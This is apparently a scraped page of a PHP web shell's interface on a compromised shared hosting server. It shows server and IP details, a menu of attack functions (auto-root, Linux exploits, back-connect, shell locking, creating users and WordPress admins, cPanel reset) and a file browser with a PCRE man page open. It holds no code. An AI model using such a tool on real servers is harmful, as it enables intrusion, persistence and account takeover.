Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
pcre802 /
usr /
share /
man /
man3 /
[ HOME SHELL ]
Name
Size
Permission
Action
pcre.3
12.35
KB
-rw-r--r--
pcre_compile.3
2.91
KB
-rw-r--r--
pcre_compile2.3
3
KB
-rw-r--r--
pcre_config.3
1.98
KB
-rw-r--r--
pcre_copy_named_substring.3
1.21
KB
-rw-r--r--
pcre_copy_substring.3
1.08
KB
-rw-r--r--
pcre_dfa_exec.3
3.85
KB
-rw-r--r--
pcre_exec.3
3.21
KB
-rw-r--r--
pcre_free_substring.3
580
B
-rw-r--r--
pcre_free_substring_list.3
577
B
-rw-r--r--
pcre_fullinfo.3
2.18
KB
-rw-r--r--
pcre_get_named_substring.3
1.34
KB
-rw-r--r--
pcre_get_stringnumber.3
987
B
-rw-r--r--
pcre_get_stringtable_entries.3
1.12
KB
-rw-r--r--
pcre_get_substring.3
1.24
KB
-rw-r--r--
pcre_get_substring_list.3
1.25
KB
-rw-r--r--
pcre_info.3
485
B
-rw-r--r--
pcre_maketables.3
723
B
-rw-r--r--
pcre_refcount.3
747
B
-rw-r--r--
pcre_study.3
1.11
KB
-rw-r--r--
pcre_version.3
470
B
-rw-r--r--
pcreapi.3
87.88
KB
-rw-r--r--
pcrebuild.3
12.57
KB
-rw-r--r--
pcrecallout.3
7.48
KB
-rw-r--r--
pcrecompat.3
6.8
KB
-rw-r--r--
pcrecpp.3
12.26
KB
-rw-r--r--
pcrematching.3
8.14
KB
-rw-r--r--
pcrepartial.3
15.9
KB
-rw-r--r--
pcrepattern.3
97.67
KB
-rw-r--r--
pcreperform.3
6.54
KB
-rw-r--r--
pcreposix.3
10.06
KB
-rw-r--r--
pcreprecompile.3
5.33
KB
-rw-r--r--
pcresample.3
2.71
KB
-rw-r--r--
pcrestack.3
6.88
KB
-rw-r--r--
pcresyntax.3
10.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pcre_get_substring_list.3
.TH PCRE_GET_SUBSTRING_LIST 3 .SH NAME PCRE - Perl-compatible regular expressions .SH SYNOPSIS .rs .sp .B #include <pcre.h> .PP .SM .B int pcre_get_substring_list(const char *\fIsubject\fP, .ti +5n .B int *\fIovector\fP, int \fIstringcount\fP, "const char ***\fIlistptr\fP);" . .SH DESCRIPTION .rs .sp This is a convenience function for extracting a list of all the captured substrings. The arguments are: .sp \fIsubject\fP Subject that has been successfully matched \fIovector\fP Offset vector that \fBpcre_exec\fP used \fIstringcount\fP Value returned by \fBpcre_exec\fP \fIlistptr\fP Where to put a pointer to the list .sp The memory in which the substrings and the list are placed is obtained by calling \fBpcre_malloc()\fP. The convenience function \fBpcre_free_substring_list()\fP can be used to free it when it is no longer needed. A pointer to a list of pointers is put in the variable whose address is in \fIlistptr\fP. The list is terminated by a NULL pointer. The yield of the function is zero on success or PCRE_ERROR_NOMEMORY if sufficient memory could not be obtained. .P There is a complete description of the PCRE native API in the .\" HREF \fBpcreapi\fP .\" page and a description of the POSIX API in the .\" HREF \fBpcreposix\fP .\" page.
Close